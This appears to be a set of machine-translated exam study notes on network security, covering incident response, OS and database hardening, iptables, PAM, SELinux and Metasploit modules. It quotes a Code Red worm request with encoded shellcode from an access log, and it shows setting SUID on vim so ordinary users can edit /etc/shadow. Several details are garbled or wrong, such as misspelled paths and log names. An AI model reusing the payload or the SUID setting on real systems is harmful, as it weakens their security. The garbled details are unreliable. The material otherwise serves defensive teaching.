malicious tampering, counterfeiting, supply interruption, information leakage or illegal operations, and other threats. The industrial control system platform is composed of industrial control system hardware, operating systems and its application software.
-
Security Risks of Artificial Intelligence Training Data
Researchers have found that mixing a small amount of malicious samples into training samples can greatly disrupt the accuracy of the AI model. This attack method is called a bait attack. -
Artificial intelligence algorithm security risks
can be avoided by using a specially designed printed pattern to avoid the artificial intelligence video surveillance system; by modifying the road sign entity, the AI road sign recognition algorithm will recognize the "No Passage" road sign as "Speed Limit 45"; it is possible Embedding a backdoor in the AI algorithm model can only trigger the backdoor when the input image contains a specific pattern. -
Security Risks of Code Implementation of Artificial Intelligence Systems
Both artificial intelligence systems and algorithms rely on the correct implementation of thousands of codes. Currently, there are unknown security vulnerabilities in open source learning frameworks
, which can lead to data leakage or loss of control of intelligent systems. For example, deep learning frameworks such as TensorFlow, Caffe, and Torch and their dependent libraries have security vulnerabilities. Multiple TensorFlow CVE vulnerabilities have been published on the CVE website. Attackers can use related vulnerabilities to tamper with or steal intelligent system data. -
Risks of misuse of artificial intelligence technology:
Artificial intelligence technology excessively collects personal data and automatically learns and infers services, leading to an increased risk of privacy leaks.
In August 2018 , Tencent's security team discovered a backdoor in Amazon's smart speakers that could enable remote eavesdropping and recording. Use deep learning to mine and analyze data resources to generate realistic false information content, threatening network security, social security and national security. Cybersecurity threat actors use intelligent recommendation algorithms to identify potential vulnerable target groups, deliver customized information content and phishing emails, and accelerate the spread of bad information and the accuracy of social engineering attacks.
5.Highly autonomous intelligent systems lead to social security risks.
The abnormal operation of intelligent systems such as autonomous driving and drones may directly harm human health and life safety.
For example, a certain brand of car with the autonomous driving function turned on was unable to recognize a white truck against a blue sky background, causing a car accident that resulted in the death of the driver. The widespread use of intelligent robots has forced the reduction of a large number of mechanical and repetitive jobs, causing employment competition issues between robots and natural persons and social equity issues.
10. Network security project evaluation project process:
preparation before commenting - design of evaluation plan - implementation of evaluation plan - writing of evaluation report - recognition of evaluation results.
Cybersecurity response organization types: non-profit, commercial, internal, vendor.
A large number of HTTP requests similar to the following appear in the access log on a website server :
"GET/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNN %u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090% u6858 %ucbd3%u7801 %u9090%u9090%u8190%u00c3%u0003%u8b00%u53lb%u53ff%u0078%u00 00%u00=a HTTP/1.0” Based on these log information, we can infer that the website was attacked by a red worm.
17. The policy of the National Internet Emergency Response Center cncert is: active prevention, timely detection, rapid response, and efforts to ensure recovery.
Article 8 of the "Cybersecurity Law of the People's Republic of China" stipulates that the national cybersecurity and informatization department is responsible for the overall coordination of network security work and related supervision and management work. The telecommunications department under the State Council, the public security department and other relevant agencies shall be responsible for network security protection, supervision and management within the scope of their respective responsibilities in accordance with the provisions of this Law and relevant laws and administrative regulations. The network security protection and supervision and management responsibilities of relevant departments of local people's governments at or above the county level shall be determined in accordance with relevant national regulations.
For matters that are unclear whether they are state secrets and what level of confidentiality they belong to, the agency or unit that caused the matter must apply for confirmation within 10 days.
1. Cybersecurity emergency response work:
cyber security threat intelligence analysis,
cyber security incident monitoring
, cyber security early warning information release,
emergency response plan preparation,
emergency response knowledge base development and management,
emergency response drills,
emergency incident handling,
cyber security emergency result analysis and summary,
cyber security education and training .
2. The national network emergency plan classifies network security incidents into four levels:
extremely serious, major,
major
, and
general: posing a certain threat to national security and social order.
3. When the integrity of the portal website is damaged, activate the first-level plan:
immediately disconnect the website server from the Internet.
Isolate the attacked website server and protect the site. Let
website professionals perform data recovery
, trace the source of the attack, and report to the superior department or call the police.
The main characteristic of DOS service attacks is extending the service waiting time.
The characteristics of DOS attacks are: difficulty in confirmation, concealment, limited resources, and software complexity.
4. When the portal or mail server is attacked by DDoS, start the secondary plan:
Use a firewall to block the source of the attack
. Change the DNS resolution to divert the denial of service attack.
Record the current connection status and save relevant logs.
If the above procedures still cannot solve the problem. , that is, disconnect the website from the Internet and alert the superior authority or the public security department.
Solve this emergency work with the assistance of the Internet management department and the public security department.
5. When the portal or email system is attacked by hackers, activate the secondary plan:
immediately disconnect the website server from the Internet.
Use a firewall to block the source of the attack
, record the current connection status, save the log,
trace the source of the attack, and report or alert the superior department.
Data recovery by website professionals
6. After the external power supply is interrupted, the secondary plan is also activated.
7. Network security emergency response process:
security incident alarm (personnel on duty - emergency team leader - emergency leadership group)
security incident confirmation,
activation of emergency plan
, security incident handling (at least 2 people participating, preparation, detection, suppression, eradication, recovery, summary)
Write a safety incident report (date of the safety incident, participants, how the incident was discovered, type of incident, scope of the incident, on-site records, resulting losses and impacts, handling process, lessons learned)
emergency work summary.
8. Six steps for safe evidence collection:
on-site evidence collection protection, identification of evidence, transmission of evidence, preservation of evidence, analysis of evidence, and submission of evidence.
Cyber security incident emergency drills are simulated responses to hypothetical cyber security incidents to confirm
the effectiveness of the emergency response working mechanism and cyber security incident plans.
The types of cybersecurity incident emergency drills are divided according to organizational form, which can be divided into desktop emergency drills and actual emergency drills;
according to content, they can be divided into single emergency drills and comprehensive emergency drills;
according to purpose and function, they can be divided into test emergency drills Drills, demonstration emergency drills and research emergency drills
In response to the problem of disaster recovery of network information systems, the country formulated and promulgated the "Information Security Technology Information System Disaster
Recovery Specification (GB/T 20988-2007)", which defines six disaster recovery levels and technical requirements. Specification requirements are as follows:
• Level 1 - Basic Support. This level requires complete data backup at least once a week, and the backup media is stored off-site;
it also needs to have a suitable venue for media storage; the enterprise must develop a management system for media access, verification and dumping,
and backup backup according to media characteristics. The data undergoes regular validity verification; enterprises need to develop
disaster recovery plans that have been fully tested and drilled.
• Level 2 – Alternate site support. On the basis of Level 1, Level 2 also requires
data processing equipment, communication lines and corresponding network equipment that can be deployed and used within a predetermined time after a disaster occurs; and for the sites where media
are stored , It needs to be able to meet the requirements for the recovery and operation of information systems and key business functions;
corresponding requirements have also been added for the enterprise's operation and maintenance capabilities, that is, a backup site management system must be developed, and disaster recovery times must be consistent with relevant manufacturers and
operators. Required emergency supply agreement, backup communication line agreement.
Level 3 - Electronic transmission and partial equipment support. Level 3 is different from Level 2 in deploying data processing equipment and having
an emergency supply agreement for network systems. It requires the configuration of some data processing equipment, some communication lines and corresponding network equipment
; it also requires the use of communication networks multiple times a day to Key data are transferred to the backup site in batches on a regular basis , and full-time
operation and management personnel are assigned to the disaster backup center . For operation and maintenance, it is required to develop an
operation and management system for electronic transmission data backup systems.
• Level 4 - Electronic transmission and complete equipment support. Compared with Level 3, which is equipped with some data processing equipment and
network equipment, Level 4 must be equipped with all data processing equipment, communication lines and network equipment required for disaster recovery and
be in a ready state; backup sites are also proposed. To support higher requirements for 7X24-hour operation , the requirements for technical support
and operation and maintenance management have also been correspondingly improved.
• Level 5 real-time data transmission and full device support. Compared with the electronic transmission of data at Level 4, Level 5 requires
the implementation of remote data replication technology and the use of communication networks to copy key data to a backup site in real time; it also requires the
backup network to have automatic or centralized switching capabilities.
• Level 6 zero data loss and remote cluster support. Compared with the real-time data replication of Level 5, Level 6 requires
remote real-time backup of data to achieve zero data loss; it also requires application software to be clustered, capable of real-time
seamless switching, and have real-time monitoring and control of remote cluster systems. Automatic switching capability; the requirements for the backup network have also been
strengthened, requiring users to access the primary and backup centers through the network at the same time.
eighteen.
In 1999, our country promulgated the "Guidelines for Classification of Security Protection Levels of Computing Information Systems"
GB 17859-1999, which covers autonomous access control, mandatory access control, identity authentication, data integrity, object reuse, auditing, marking, covert channel analysis, and In terms of trust path and trusted recovery, the security protection capabilities of computer information systems are divided into five levels: the
first level is the user independent protection level;
the second level is the system audit protection level; the third level is the security mark protection
level;
The fourth level is the structured protection level;
the fifth level is the access verification protection level.
System audit protection level: finer-grained autonomous access control, audit security.
Security mark protection level: Implement mandatory access control on all subjects and controlled objects.
Structured protection levels: Consider covert communications.
In 2001, with reference to the international general code CC and the international standard ISO/IEC 15408, my country issued the "Information Technology Security Technology Information Technology Security Assessment Guidelines" (GB/T 18336-2001).
GB/T 18336-2001 is divided into three parts (cc):
"Part 1: Introduction and general model"
"Part 2: Safety functional requirements"
"Part 3: Safety assurance requirements".
In 2008, based on foreign information security evaluation standards, my country established its own system of information system security level protection standards.
sc27 (Sub-Technical Committee for Information Security General Methods and Technology Standardization Work)
Working Group 1: WG1: Requirements, Security Services and Guidelines Working
Group 2: WG2: Security Technology and Mechanism Working Group
Working Group 3: WG3: Security Assessment Criteria Working Group
2. There are three types of network security assessment: security level assessment, security acceptance assessment, and security risk assessment.
Assessment and scoring based on content: technical assessment, management assessment.
Object-based confidentiality scoring: confidential information and non-confidential information
3. Network security level assessment is mainly divided into:
technical security assessment: secure physical environment, communication network security, regional boundary security, secure computing environment, and security management center.
Management safety assessment: management organization, management system, management personnel, safety construction management, safety operation and maintenance management.
4. The process of network security penetration testing:
commission acceptance, preparation, implementation, comprehensive assessment, and conclusion
5. Security penetration testing:
The process of network security penetration testing can be divided into five stages: commission acceptance, preparation, implementation, comprehensive evaluation and conclusion.
Classification based on the confidentiality of the assessment objects
. According to the confidentiality nature of the assessment objects, network security assessments can be divided into two types: security assessments of confidential information systems and
security assessments of non-confidential information systems.
3 Types of Penetration Testing
Black Box:
White Box: Advanced Sustainability Threat Simulation
Gray Box: Mobile Banking and Code Security Testing.
The evaluation mainly includes: security function testing, security management testing, code security review, security penetration, and information system attack testing.
Nineteen (key points), operating system security requirements mainly include:
identification and authentication,
access control,
system resource security,
network security,
anti-attack,
self-security
System security research is divided into: basic theoretical research, applied technology research, security management research, security standard research, security strategy research, and security evaluation research.
2. Operating system security mechanism:
hardware security
, identification and authentication,
access control
, least privilege,
security audit,
trusted path,
system security enhancement
Analysis of Windows system security issues:
passwords, malicious code, application software vulnerabilities, system program vulnerabilities, registry security, file sharing security, physical proximity attacks
The structure of Windows XP is a mixture of hierarchical structure and client/server structure. Its system structure is
divided into three layers.
Among them, the lowest layer is the hardware abstraction layer, which provides the interface of the hardware structure for the upper layer. With this layer, the system can be easily transplanted; the
second layer is the kernel layer, which provides execution, interrupts, and exceptions for the lower layer. Processing and synchronization support;
the third layer is a series of modules that implement basic system services
• The file permissions of inetd.conf are set to 600;
• The file owner of inetd.conf is set to root;
• The file permissions of services are set to 644;
• The file owner of services is root;
• In inetd.conf, logout is not necessary Services, such as finger, echo, chargen, rsh, rlogin, tftp
services;
• Only open network communication ports related to system business operation.
3. There are two types of Windows authentication:
local authentication: user and ad domain control authentication on the local machine.
Network authentication: authentication based on the specific target service to be accessed.
When a Windows user logs in to the system, the WinLogon process creates an access token for the user, which contains the security identifier (SID) of the user and the group to which it belongs, as the user's identity. Objects such as files contain Discretionary Access Control Lists (DACLs), which indicate who has access, and System Access Control Lists (SACLs), which indicate which subjects' access needs to be recorded. When a user process accesses an object object, it requests access services from the core through the WIN32 subsystem. The core's Security Reference Monitor (SRM) compares the access token with the object's DACL to determine whether the object has access rights, and also checks the object's SACL. Determine whether this visit falls within the established audit scope, and if so, send it to the audit subsystem.
4. Windows log:
System log: sysentert
Application log: appsysentert
Security log: seceventvet
5. How to improve the security of the Windows system:
regularly patch vulnerabilities, stop useless services and uninstall useless software, regularly upgrade and update programs, modify the configuration and permissions of the system or application software, regularly check for Trojans and viruses, and install security tools and anti-virus software.
6. System startup security enhancement:
account and password security enhancement: deactivate the guest account, rename the administrator, then create an administrator account with ordinary user rights, set a complex password, prevent the system from displaying the last login account, and enable a password and account security policy (automatically locked for 20 minutes if the password is incorrect three times, the password is valid for 42 days, and the password is no less than 6 characters in length), set the password when entering the BIOS, and prohibit the boot of the BIOS CD-ROM U disk pxe, etc.
Windows 2000 security enhancements:
1. System startup security enhancement
2. Account and password management security enhancement
1) Stop guest account
2) Limit the number of unnecessary users
3) Rename the system Administrator account
4) Create a trap account
5) Set up security Complex passwords
6) Set a screen saver password
7) Prevent the system from displaying the last logged-in user name
8) Enable password security policy
9) Enable account policy
3. Install the latest system patches
4. Enhance network security
1) Prohibit the establishment of empty connections
2 ) Turn off default sharing
3) Turn off unnecessary network services and network ports
5. Install third-party protection software
7. Prevent anonymous access to the computer
with restrictanonymouse=2 under HKLM\SYSTEM\CurrentControlSet\Control\Lsa
8. Adjust the firewall to prohibit external network access to ports 135-139 and 445.
9. Windows security policies include: account policy, audit policy, remote access policy, and file sharing policy.
Windows 2000 system has a special security subsystem in terms of security design. The security subsystem mainly consists of Local Security Authorization
(LSA), Security Account Management (SAM) and Security Reference Monitor (SRM).
The Windows 2000 security system integrates three different authentication technologies:
Kerberos V5, public key certificates, and NTLM.
Linux three layers: hardware layer, system kernel, application layer
Linux authentication: 1. Password-based authentication method 2. Terminal authentication 3. Host trust mechanism 4. Third-party authentication
The finger service can obtain remote Linux host information
10. Linux system reinforcement:
Determine the business application requirements on the Linux system.
Install the most necessary programs for your business, minimize security, and do not install unnecessary programs.
Configure system security mechanisms: account password, access control, network services, system audit, system audit, etc.
Utilize third-party software to enhance system security, such as selinux
Security self-check, use nmap to scan ports, use cops for file configuration detection, crack for password detection,
Reconfigure based on test results
Conduct security monitoring of the system from time to time, such as: process monitoring, user monitoring, network connection monitoring, log analysis, etc.
11. Linux system security enhancement:
regularly patch vulnerabilities
, run with minimum privileges, prohibit useless services and ports,
and grant 600 permissions to the inetd.conf file. The file owner is root and turn off useless services.
Give the service file 644 permissions and the file owner is
Set a boot protection password for root ,
avoid weak passwords,
disable default accounts,
use the system's own firewall such as iptables, and
use SSH to enhance network service security. Use
tcp_wrapper to enhance access control.
Use Tripwire or MD5Sum integrity detection tools to detect LKM backdoors.
System security monitoring
Through LSM, relevant security organizations can develop specific security modules according to security needs and hook them to the Linux operating system. Currently, the main methods used to enhance Linux security in this way include plug-in authentication module framework (Pluggable
Authentication Modules, PAM), SELinux, etc.
There are 4 types of content in each file below PAM security
/etp/pam.d/ . Generally, the content specified in the first column is: module-type.
There are only 4 types in total, which are:
auth: identify the user identity, such as prompting for input Password, determine whether it is root or not;
account: Check various attributes of the account, such as whether login is allowed, whether the maximum number of users
has been reached; session: define the operations to be performed before login and after exit, such as login connection information, user data Open and close, mount fs;
password: use user information to update data, such as changing user passwords.
/etp/pam.d/system-auth
auth required pam_tally2.so deny=3 unlock_time=5 even_deny_root root_unlock_time=10 If the password is incorrect 3 times in a row, the account will be locked. Ordinary users will unlock it after 3 seconds, and root users will unlock it after 10 seconds.
password requisite pam_cracklib.so try_first_pass retry=3 type= minlen=8 ucredit=-2 lcredit=-4 dcredit=-1 ocredit=-1
(If the login fails, you can retry 3 times; the minimum password length is 8; at least 2 uppercase letters are included ; Contain at least 4 lowercase letters; Contain at least one number; Preferably contain one special character)
password sufficient pam_unix.so md5 shadow nullok try_first_pass use_authtok remember=5 (the old password used by the user in the last 5 times cannot be reused)
Enterprise servers in real scenarios sometimes need to limit the number of logins for remote users to prevent malicious users from trying to enter different passwords multiple times and carry out credential stuffing attacks. This function can be implemented through the pam_tally2.so dynamic library of the PAM authentication module.
/etc/pam.d/sshd Add the next line:
auth required pam_tally2.so even_deny_root deny=3 unlock_time=60
even_deny_root: Even the super user root will be denied
unlock_time=60: Set the unlocking time to 60 seconds. After no login attempts are made beyond this unlocking time of 60 seconds, you can re-enter the correct password and you can log in again
deny=3: Set the number of rejections Deny is set to 3 times. After you enter the wrong password for consecutive deny times, even if you enter the correct password for the deny+1st time, you will still be denied login (that is, the user is locked).
5) First use the super user root to log in remotely through ssh and enter the wrong password 3 times. After entering the password, even if the correct password is entered for the fourth time, the login is still refused (that is, the root user is locked), and the even_deny_root parameter takes effect; unless the command pam_tally2 --user root --reset is executed to reset the number of failed logins to 0 (i.e. The root user is unlocked), and the user can log in successfully after entering the correct password;
6) Use the ordinary user redhat to perform the login test. After exceeding the number of rejections set by deny=3, even if the user enters the correct password, he still cannot log in successfully (both the redhat user locked), unless the command pam_tally2 --user redhat --reset is executed to reset the number of login failures to 0 (that is, the redhat user is unlocked), you can log in successfully again by entering the correct password.
SELinux implements mandatory access control on Linux systems by setting tags and security policy rules.
Selinx mainly includes two modes and strategies:
modes are: enforcing, permissive, and disabled.
Check getenforce settings: setenforce 0 or 1, 1 is enforcing mode, 0 is permissive mode
Strategies include: targeted, minimum,
use sestatus to view mls
Targeted
is the default policy type, which adopts MCS level security policy. System processes are divided into two categories. One type runs in the confined domain, and any access request is restricted by SELinux, which is called targets; the other type runs in the unconfined domain and is not restricted by SELinux. All processes located in the confined domain are subject to SELinux restrictions.
minimum
is the targeted subset, and only processes in the specified confined domain are subject to SELinux restrictions.
mls
SELinux adopts the targeted policy by default. Targeted processes run in restricted domains, and untargeted processes run in unrestricted domains.
In the MLS policy, all processes are divided into fine-grained security domains, which are restricted by the MLS policy. If the mls policy also adopts the Bell And LaPadula model, all processes are further restricted by the security level of the data.
Linux login prompt message
/etc/issue
/r operating system version
/m hardware level
/s operating system name
After ssh remote connection, prompt information switch
/etc/ssh/sshd_config
Banner none
Linux password size, length, etc. are set in this file cat /etc/login.defs
iptables has four tables and five links:
1. "Four tables" refers to the functions of iptables
- filter table (filtering rule table): controls whether data packets are allowed to enter and exit and forward
- nat table (address translation rule table): controls the content of data packets Address translation
- mangle (modify data mark bit rule table): modify the original data in the packet
- raw (tracking data table rule table): control the activation status of the connection tracking mechanism in the nat table
2. "Five chains" refers to the five rule chains defined by NetFilter in the kernel that controls the network. Each rule table contains multiple data links, and firewall rules need to be written to these specific data links.
——INPUT (inbound data filtering): Process data from the outside
——OUTPUT (Outbound data filtering): Process data sent out.
——FORWARD (forwarding data filtering): forward the data to other network card devices of the machine
——PREROUTING (pre-routing filtering): – Process the data packets that have just arrived at the machine and are forwarded by the route. It converts the destination IP address in the data packet and is usually used in DNAT (destination NAT).
——POSTROUTING (post-routing filtering): – Processing of data packets that are about to leave the machine. It converts the source IP address in the packet and is commonly used for SNAT (source NAT).
Iptables planning:
iptables -t table name <-A/I/D/R> rule chain name [rule number] <-i/o network card name> -p protocol name <-s source IP/source subnet> --sport source port <-d destination IP/destination subnet> --dport destination port -j action
First, let’s translate the meaning of dport and sport:
dport: destination port
sport: source port
It is easy to get confused when learning iptables for the first time, but I will try my best to explain it to you in plain language.
The literal meaning of dport and sport is easy to understand. One is the destination port where the data reaches, and the other is the port where the data comes from.
But when using it, it should be treated according to the specific situation. This specific situation is the flow behavior of your data packets. (INPUT or OUTPUT)
For example, in your example: /sbin/iptables -A INPUT -p tcp –dport 80 -j ACCEPT.
Pay attention to the INPUT parameter inside. This represents the "entry" operation of your data packet!
Then your data packet can be described as follows:
1. This is a piece of data entering the internal local server from the outside.
2. The destination (dport) address of the data packet is 80, which means it wants to access my local port 80.
3. Allow the above data behaviors to pass.
Sum: Allow external data to access port 80 of my local server.
Look at the second example: /sbin/iptables -A INPUT -p tcp –sport 80 -j ACCEPT
1. This is a piece of data entering the internal local server from the outside.
2. The source port of the data packet is (sport) 80, which means that the other party's data packet is sent from port 80.
3. Allow the above data behavior.
Summary: Allow external data from port 80 to access my local server.
Summary of input methods: dport refers to local, and sport refers to external.
If your data packet is (OUTPUT) behavior, then there is another way to understand it:
for example:
/sbin/iptables -A OUTPUT -p tcp –dport 80 -j ACCEPT
1. This is a piece of data going out from within.
2. The outgoing destination (dport) port is 80.
3. Allow the above data behavior.
Summary of output behavior: dport refers to external and sport refers to local.
iptables -nvL
view plan all
iptables -nvL --line-number
View rules with numbers
iptables -R INPUT 3 -j ACCEPT
modify the third rule
iptables -F
iptables -X
iptables -Z
clear plan
iptables -A INPUT -j REJECT
is placed at the end by default and rejects all
iptables -I INPUT -p tcp --dport 22 ACCEPT
releases port 22
iptables -I INPUT -s 192.168.1.5 -j DROP
is added in front to deny all communications from this ip. If you do not write any line, it will default to line 1.
iptables -I INPUT 3 -s 192.168.1.3 -j DROP
inserts a rule to line 3
iptables -D INPUT -s 192.168.1.5 -j DROP
deletes this rule
Directly reject the icmp request packet
sudo iptables -A INPUT -p icmp --icmp-type echo-request -j REJECT.
If you try to ping this host at this time,
Reply from 192.168.50.131: Destination port unreachable will appear.
Log daemon:/ect/rsyslog.conf
btmp error login record, use lastb command to view
linux user 0 super user, 1-99 system management users, more than 500 ordinary users
/etc/passwd 644
/etc/shadow 400
/etc/passwd file
username-password-uid-gid-username identification-user home directory-user shell
/etc/shadow file
Username-Password-Last password modification time-Password modification time interval-Password validity period-How many days before password expiration reminder-Number of grace days after password expiration-Account expiration time-Retention
/etc/group file
group name-group password-group ID-group members
/etc/gshadow file
group name-group password-group administrator-group members
When setting SUID, SGID, and SBIT, the first three corresponding characters must have X execution permission. Otherwise, it will be useless even if you give suid, sgid, and sbit. It will be displayed in uppercase. If you have X permission first and then give these If it is lowercase, it will be useful.
1. -rwsr-xr-x indicates that the executable bit in SUID and owner permissions is set
2. -rwSr–r-- indicates that the SUID is set, but the executable bit in the owner permissions is not set (x permissions were not given previously)
3. -rwxr-sr-x means that the executable bit in the SGID and user permissions of the same group is set.
4. -rw-r-Sr-- indicates that the SGID is set, but the executable bit in the user permissions of the same group is not socialized.
For example, the value of -rwsr-xr-x above is:
1 0 0 1 1 1 1 0 1 1 0 1. Converting the three digits into decimal is 4755
The value of -rw-r-sr– is:
0 1 0 1 1 0 1 0 0 1 0 0 The three digits converted to decimal are 2644
suid
is only used for files
sbit:
For directories, only the creator can delete files in the directory.
Example: chmod o+t
sgid is for a directory or file, and the group belonging to the directory inherits the group belonging to the parent directory.
Example: chmod g+s
sbit
chmod o+t
Suid is created for the file: Allow other users without permissions to the file to also use this file to perform a series of operations similar to root permissions.
For example: add suid permission to vim, then ordinary users can also vim /etc/shdow to modify files.
chmod u+s /usr/bin/vim
SGID
can act on both directories and executable files.
As long as the parent directory has SGID permissions, all subdirectories will recursively inherit it.
The executor needs to have x permissions on the executable file
. During the execution process, the caller will temporarily obtain the The group permissions to which the file belongs
When t appears in the x permission position of other groups, it means that other groups have the permissions of SBIT.
SBIT (Sticky Bit) is currently only valid for directories. Its function for directories is: when a user creates a file or directory in this directory, only he and root have the authority to delete it.
The most representative one is the /tmp directory. Anyone can add or modify files in /tmp (because the permissions are all rwx), but only the creator of the file/directory and root can delete their own directories or files.
Find which files use suid:
find /usr/bin/vim -perm 4755
Umask (the value of umak can be modified in the /etc/profile and /etc/bashrc scripts):
The permission of the new folder created by the root user is 755. This number is because the umask of root is 022, so the default 777-022 is 755
. The permission to create a file is 644. This number is because the umask of rott is 022, so the default 666-022 is 644.
The permissions of new folders created by ordinary users are 775. This number is because the umask of ordinary users is 002, so the default is 777-002.
The permissions of newly created files by ordinary users are 664. This number is because the umask of ordinary users is 002, so the default is 666- 002 is 664
12. Domestic operating systems should be: independent and controllable, safe and trustworthy, and enhance the open source operating system Linux system.
There must be separation of three powers: configuration rights, authorization, and audit rights.
The main security risks faced by domestic operating systems are:
- Security risks of the Linux kernel
2. Security of self-developed system components
3. Security of relying on third-party system components
4. Security of system security configuration
5. Security of hardware
Security enhancement measures for domestic operating systems:
Domestic operating systems enhance the security of the open source operating system Linux in terms of autonomy, controllability, security and trustworthiness, and provide security guarantees for the Linux operating system from many aspects, including administrator decentralization, least privileges, Combined with multiple security functions such as role-based type-based access control, fine-grained autonomous access control, multi-level security (i.e. prohibiting reading and writing), it provides comprehensive security protection from the kernel to applications.
Metasploit module introduction
It is a penetration testing framework (module introduction)
auxiliary: auxiliary module, auxiliary penetration (port scanning, login password blasting, vulnerability verification, etc.)
exploits (exp): vulnerability exploitation module, including mainstream vulnerability exploitation scripts, usually Exploit certain potentially
vulnerable targets.
Naming rules: operating system/various application protocol classification
payloads: attack load, mainly the code executed on the target machine after a successful attack, such as the code of the rebound shell
post: post-penetration phase module, after the vulnerability is successfully exploited to obtain the meteroreter, it is sent to the target Some functional instructions,
such as privilege escalation, etc.
encoders: The encoder module mainly contains various encoding tools to encode and encrypt the payload
in order to bypass the intrusion detection and filtering system.
evasion: evasion module, used to generate anti-kill payload
nops: Since IDS/IPS will check irregular data in the data packet, in some cases, such as for overflow attacks
, some special sliding strings (NOPS x90x90) will The attack fails because it is intercepted.
20 (Key points). There are two encryption methods for data inventory: encryption inside the database and encryption outside the database.
Database security threats: misuse of authorization, logical judgment and aggregation, disguise, bypass control, covert channels, SQL injection attacks, database password cracking, hardware and media attacks
Database security requirements:
database identification and authentication,
database access control,
database security audit,
database backup and recovery,
database encryption,
resource restriction (to avoid denial of service attacks on the database system),
database security reinforcement
, database security management
Database security implementation technology:
database encryption,
database firewall,
database desensitization,
database vulnerability scanning
1. The database firewall is analyzed based on the sql protocol.
2. Database firewall function:
It can detect SQL injection and overflow attacks on data inventory by users in real time, and alarm and record logs, virtualization patches, protect vulnerable databases, limit updates and delete affected database row operations.
The security function of database firewall
(1) blocks direct access to the database.
(2) Enhanced authentication.
(3) Attack detection.
(4) Prevent vulnerability exploitation.
(5) Prevent internal high-risk operations.
(6) Prevent sensitive data leakage
(7) Database security audit.
3. Database desensitization: transform the data in the database so that the data is not leaked to unauthorized users.
Desensitization technical methods: shielding, transformation, replacement, randomization, encryption.
There are three commonly used encryption technologies and methods in databases: file-based, field-based, and record-based.
Database encryption refers to encrypting the data stored or transmitted in the database and storing or transmitting it in the form of ciphertext to prevent
data leakage and protect the security of sensitive data.
Database encryption methods are mainly divided into two types:
one is the data transmitted over the Internet with the database, which is usually implemented using the SSL protocol;
the other is the data stored in the database, which is implemented through database storage encryption. According to the relationship between the encryption component and the database management system, database storage encryption can be divided into two encryption methods: encryption within the database and encryption outside the database. In-library encryption refers to the implementation of modules that support encryption within the DBMS.
4. Oracle database has an audit function, with three types of audit activities: login attempts, database activities, and object storage. Oracle provides data transparent encryption (using different keys for different data encryption) and data shielding mechanisms to protect data security.
Oracle internal password is stored in the strXXX.cmd file, where XXX is the Oracle system ID and SID, and
the default is "ORCL". This password starts the process with thousands of databases, providing full access to database resources. This
file requires setting permissions in Windows NT.
• The Oracle listening process password is saved in the file "listener.ora" (which stores all Oracle execution passwords)
and is used to start and stop the Oracle listening process. This requires setting a strong password instead of the default one,
and setting permissions for access. Intruders can use this vulnerability to conduct DoS attacks.
• Oracle's "orapw" file permission control, Oracle internal passwords and account passwords allow the SYSDBA role to be
saved in the "orapw" text file, and access permissions to this file should be restricted. Even if it is encrypted, it can still be
brute force cracked by intruders.
5. The published vulnerabilities of the ms sql server database include: denial of service, code execution, overflow, and privilege acquisition.
The system database is a set of databases created and provided internally by SQL Server. There are four main databases among them. They are Master, Msdb, Model and Tempdb respectively.
Master database: used to record all SQL Server system-level information, which is used to control user databases and data operations.
Msdb database: used by Enterprise Manager and Agent, recording task planning information, event processing information, data backup and recovery information, warning and exception information.
Model database: SQL Server provides a template for user databases. New user databases are based on the model database. Each time a new database is created, SQL Server first makes a copy of the model database and then expands the copy to the required size.
tempdb database: a shared workspace that can be used by all databases in SQL Server. It provides a storage area for temporary tables and other temporary work.
MS SQL security analysis
User authentication
Access control
Database encryption
Backup and recovery mechanism
Security audit
SQL injection attack process
SQL injection attack: The attacker inserts SQL commands into the input field of the Web form or the query string of the page request
, and deceives the server into executing malicious SQL commands.
Defense measures against SQL injection attacks
The permissions of ordinary users and system administrator users must be strictly distinguished.
Force the use of parameterized statements.
Enhance validation of user input.
Mask error messages.
Encrypt data sensitive information.
Directory minimized permission settings.
6. SQL Server uses role access control. There are three roles: fixed server role, fixed database role, and database application role. Each role has different permissions.
7. SQL Server has 4 backup solutions: file and file group backup, transaction log backup, full backup, and differential backup.
There are three recovery models: simple recovery, logging recovery, and full recovery.
8. The main vulnerabilities of the MySQL database are: denial of service, overflow, code execution, evasion, and privilege acquisition.
SQL server has service master key, database master key, database key
9. Mysql has 5 authorization tables: user, db, host, tablespriv, columns priv.
10. Only administrative users of MySQL can use the grant and revoke commands to create users, authorize and revoke rights, delete users and other high-risk operations.
The libraries that come with version 5.6 are: information_schema, mysql, performance_schema, and test.
information_schema
saves the information of all databases in the MySQl service. Specifically, how many databases does the MySQL service have, what tables are in each database, what data types are the fields in each table, what indexes are in each table, and what permissions are required to access each database.
mysql
saves MySQL's permissions, parameters, objects and status information. For example, which users can access this data, DB parameters, plug-ins, master-slave
performance_schema
is mainly used to collect database server performance parameters to provide detailed information about process waiting, including locks, mutually exclusive variables, and file information; to save historical event summary information to make detailed judgments on MySQL server performance; to
monitor new additions and deletions Event points are very easy, and the monitoring cycle of the mysql server can be changed at will, such as (CYCLE, MICROSECOND)
test
has nothing
Microsoft has established the Microsoft Security Response Center (MSRC). MSRC releases security bulletins monthly to address security vulnerabilities, and will publish a vulnerability exploitation index, which is divided into four levels, namely
0 - detected to be exploited, 1 - likely to be exploited, 2 - unlikely to be exploited and 3 - not may be exploited.
Database firewall function:
"Dasher.B" worm. The worm can target Microsoft MS04-045 and MS04-039 vulnerabilities or use SQL
overflow tools to attack.
Common data desensitization techniques include
shielding, deformation, replacement, randomization, and encryption to prevent sensitive data from being leaked to unauthorized users or systems. For example, assume that the item identification data is as follows:
4346 6454 0020 5379
4493 9238 7315 5787
4297 8296 7496 8724
After desensitization by replacement, the item identification data becomes the following form:
4346 xxxx XXXX 5379
4493 XXXX XXXX 5787
4297 XXXX xxxx 8 724
21. Switch security:
Switch security enhancement
1. Turn off unnecessary network services
2. Create a local account
3. Enable SSH service
4. Restrict secure remote access 5. Restrict
console access 6.
Enable login security check
7. Security audit
8. Restrict SNMP access
9 , Safely save the switch IOS software image file
10. Close unnecessary ports
11. Close the console and monitoring audit
12. Warning information
ssh配置方法:
[H3C]public-key local create rsa
#生成rsa密钥对
The range of public key modulus is (512 ~ 2048).
If the key modulus is greater than 512, it will take a few minutes.
